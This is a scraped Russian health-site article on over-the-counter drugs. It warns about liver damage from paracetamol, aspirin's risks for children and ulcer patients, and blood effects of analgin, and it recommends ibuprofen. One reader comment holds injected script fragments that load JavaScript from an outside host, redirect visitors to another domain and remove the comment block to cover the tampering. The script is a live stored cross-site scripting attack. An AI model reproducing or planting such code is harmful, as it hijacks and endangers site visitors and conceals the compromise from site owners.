Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Лекарства без рецепта: по...  >>  Лекарства без рецепта: побочные эффекты таблеток
 
Обратная связь
 

Лекарства без рецепта: побочные эффекты таблеток

Размер шрифта
12 апреля 2012 10:00
  • google_analytics: false
  • Нравится

Чаще всего без рецепта мы покупаем три лекарства: анальгин, аспирин и парацетамол. Все они обладают жаропонижающим, обезболивающим и … побочным действием. О чем следует помнить, покупая эти лекарства в аптеке, чем они опасны и на что их можно заменить?

  1. Парацетамол (ацетаминофен) разрушает печень

Парацетамол содержится в препаратах Колдакт, Колдрекс, Панадол, Каффетин, Цитрамон и часто продается без инструкции, в бумажной упаковке, что является грубым нарушением закона. Кроме основных действий, жаропонижающего и обезболивающего, парацетамол оказывает негативное действие на печень.

Как это происходит?

Все, что попадает в организм через желудочно-кишечный тракт, попадает в печень. Задача клеток печени – обезвредить любое вещество, попавшее в организм. В терапевтических дозах парацетамол не оказывает отрицательного действия на наши органы. Совсем другое дело, когда человек принимает это лекарство в больших дозах или к примеру, с алкоголем, разрушающим печень. В этом случае токсическое действие парацетамола на печень значительно усиливается.

Обратите внимание!

  • Детям до 2-х лет давать парацетамол можно только по назначению врача. За рубежом детские жаропонижающие средства с парацетамолом введены в разряд рецептурных препаратов с одной целью: дозу должен рассчитать именно врач.
  • Взрослым нельзя принимать больше 4х г парацетамола в день. Более высокие дозы опасны тем, что может развиться острая печеночная недостаточность, смертельно опасное состояние.

На что заменить парацетамол

Сегодня самый безопасный и более эффективный способ снизить температуру и снять боль – это ибупрофен. Детское лекарство с этим веществом в составе называется Нурофен.

  1. Аспирин противопоказан детям и язвенникам

Это одно из первых лекарств синтезированное учеными для снижения температуры и снятия боли. Сегодня его применяют так ж для предупреждения инфарктов и инсультов.

Обратите внимание!

  • Аспирин провоцирует язву желудка и двенадцатиперстной кишки. Людям с гастритом и язвой этот препарат запрещен. Если человек страдает изжогой, то перед применением аспирина нужно проконсультироваться с врачом.
  • У детей с инфекционным заболеванием аспирин приводит к развитию синдрома Рея, энцефалопатии и ведет к разрушению печени. У ребенка внезапно возникают судороги. Может развиваться печеночная недостаточность, что приведет к смертельному исходу. В США детям младше 12 лет, а в Англии младше 16 лет употребление аспирина разрешено только по рекомендации врача.
  1. Анальгин снижает количество клеток крови

Анальгин обладает жаропонижащим и обезболивающим действием. Но у него есть побочное действие: агранулоцитоз, при котором снижается количество клеток крови, в частности, белых клеток крови, борющихся с инфекцией. Если анальгин вы принимаете в больнице, то есть под наблюдением врача, то осложнения вряд ли возникнут. Совсем другое дело, когда вы употребляете это лекарство бесконтрольно.

На что заменить анальгин?

Самое безопасное средство в этой группе лекарств – ибупрофен.

Сюжеты по теме:
Лекарства без рецепта: побочные эффекты таблеток

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:44

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Побочные реакции на лекарства   Краткий обзор лекарств   Безрецептурные лекарственные препараты   Природные альтернативы самым частым лекарствам  
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.